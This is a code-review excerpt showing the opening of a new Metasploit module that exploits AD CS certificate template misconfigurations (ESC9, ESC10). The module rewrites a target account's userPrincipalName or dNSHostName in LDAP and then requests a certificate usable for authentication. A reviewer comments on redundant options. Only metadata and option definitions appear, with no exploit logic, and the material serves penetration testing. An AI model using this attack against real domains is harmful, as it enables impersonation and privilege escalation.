modules/auxiliary/admin/dcerpc/esc_update_ldap_object.rb

```diff
@@ -0,0 +1,148 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'ruby_smb/dcerpc/client'
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::LDAP
+  include Msf::Exploit::Remote::MsIcpr
+  include Msf::Exploit::Remote::SMB::Client::Authenticated
+  include Msf::Exploit::Remote::DCERPC
+  include Msf::Auxiliary::Report
+  include Msf::OptionalSession::SMB
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Exploits AD CS Template misconfigurations which involve updating an LDAP object: ESC9 and ESC10',
+        'Description' => %q{
+          This module updates an LDAP object with a new value before requesting a certificate.
+          Request certificates via MS-ICPR (Active Directory Certificate Services). Depending on the certificate
+          template's configuration the resulting certificate can be used for various operations such as authentication.
+          PFX certificate files that are saved are encrypted with a blank password.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Will Schroeder', # original idea/research
+          'Lee Christensen', # original idea/research
+          'Oliver Lyak', # certipy implementation
+          'Spencer McIntyre', # icpr_cert module implementation
+          'jheysel-r7' # module implementation
+        ],
+        'References' => [
+          [ 'URL', 'https://github.com/GhostPack/Certify' ],
+          [ 'URL', 'https://github.com/ly4k/Certipy' ],
+          [ 'URL', 'https://medium.com/@offsecdeer/adcs-exploitation-series-part-2-certificate-mapping-esc15-6e19a6037760' ]
+        ],
+        'Notes' => {
+          'Reliability' => [],
+          'Stability' => [],
+          'SideEffects' => [ IOC_IN_LOGS ],
+          'AKA' => [ 'ESC9', 'ESC10' ]
+        },
+        'Actions' => [
+          [ 'REQUEST_CERT', { 'Description' => 'Request a certificate' } ]
+        ],
+        'DefaultAction' => 'REQUEST_CERT'
+      )
+    )
+
+    register_options([
+      OptEnum.new('UPDATE_LDAP_OBJECT', [ true, 'Either userPrincipalName or dNSHostName, Updates the necessary object of a specific user before requesting the cert. Used to exploit ESC9 and ESC10. ', 'userPrincipalName', %w[userPrincipalName dNSHostName] ]),
+      OptString.new('TARGET_USERNAME', [true, 'The username of the target LDAP object.']),
+      OptString.new('NEW_VALUE', [true, 'The new value for the specified attribute.']),
```

Comment:
I think this might be redundant. If `UPDATE_LDAP_OBJECT` is `userPrincipalName` you'd require `ALT_UPN` to be specified for the attack and you could determine that `NEW_VALUE` would be `datastore['ALT_UPN'].split('@').first` I think. You could do a similiar thing when `UPDATE_LDAP_OBJECT` is `dNSHostName` because the `ALT_DNS` would need to be specified right?

That also raises a point that for this attack to work, depending on the value of `UPDATE_LDAP_OBJECT`, you probably want to make sure that either `ALT_UPN` or `ALT_DNS` is set.